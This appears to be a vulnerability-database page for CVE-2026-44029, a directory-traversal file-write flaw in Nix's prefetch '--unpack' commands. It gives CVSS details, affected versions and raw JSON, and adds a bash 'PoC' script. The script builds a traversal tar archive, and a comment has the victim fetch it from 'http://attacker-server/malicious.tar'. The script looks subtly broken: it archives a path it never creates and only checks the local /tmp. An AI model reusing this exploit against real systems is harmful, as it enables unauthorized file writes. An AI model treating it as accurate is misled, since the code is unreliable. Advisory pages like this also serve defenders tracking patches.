Security Vulnerability Report
CVE-2026-44029 CVSS 5.3 MEDIUM

CVE-2026-44029

Published: 2026-05-05 01:16:07
Last Modified: 2026-05-05 19:47:31

Description

An issue was discovered in Nix before 2.34.7. Writing to arbitrary files can occur via "nix-prefetch-url --unpack" or "nix store prefetch-file --unpack" directory traversal. The fixed versions are 2.34.7, 2.33.6, 2.32.8, 2.31.5, 2.30.5, 2.29.4, and 2.28.7 (introduced in 2.24.7).

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Nix < 2.34.7
Nix < 2.33.6
Nix < 2.32.8
Nix < 2.31.5
Nix < 2.30.5
Nix < 2.29.4
Nix < 2.28.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# PoC for CVE-2026-44029: Nix Directory Traversal / Arbitrary File Write
# 1. Create a directory structure for the malicious payload
mkdir -p poc_exploit
# 2. Create a file to be written to an arbitrary location (e.g., /tmp/pwned.txt)
echo "CVE-2026-44029 Exploited: Arbitrary write successful" > poc_exploit/data.txt
# 3. Create a tar archive containing the file with a path traversal sequence
# Note: Modern tar tools may warn or block this, but the vulnerable Nix version processes it.
# Using --absolute-names or constructing the symlink manually might be needed depending on the implementation.
cd poc_exploit
tar --absolute-names -cf ../malicious.tar ./../../../../tmp/pwned.txt
cd ..
# 4. Simulate hosting the file (in a real scenario, host this on a web server)
echo "Host malicious.tar on a server accessible by the target."
# 5. Trigger the vulnerable command on the target system
# The attacker tricks the victim/system into running:
# nix-prefetch-url --unpack http://attacker-server/malicious.tar
# Verification: Check if the file was written to /tmp/
if [ -f "/tmp/pwned.txt" ]; then
    echo "[+] Exploit successful: File written to /tmp/pwned.txt"
    cat /tmp/pwned.txt
else
    echo "[-] Exploit failed or not executed"
fi

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44029", "sourceIdentifier": "[email protected]", "published": "2026-05-05T01:16:07.170", "lastModified": "2026-05-05T19:47:31.297", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Nix before 2.34.7. Writing to arbitrary files can occur via \"nix-prefetch-url --unpack\" or \"nix store prefetch-file --unpack\" directory traversal. The fixed versions are 2.34.7, 2.33.6, 2.32.8, 2.31.5, 2.30.5, 2.29.4, and 2.28.7 (introduced in 2.24.7);"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-36"}]}], "references": [{"url": "https://discourse.nixos.org/t/security-advisory-local-privilege-escalation-in-lix-and-nix/77407", "source": "[email protected]"}, {"url": "https://github.com/NixOS/nix/security/advisories/GHSA-gr92-w2r5-qw5p", "source": "[email protected]"}, {"url": "https://www.openwall.com/lists/oss-security/2026/05/04/33", "source": "[email protected]"}]}}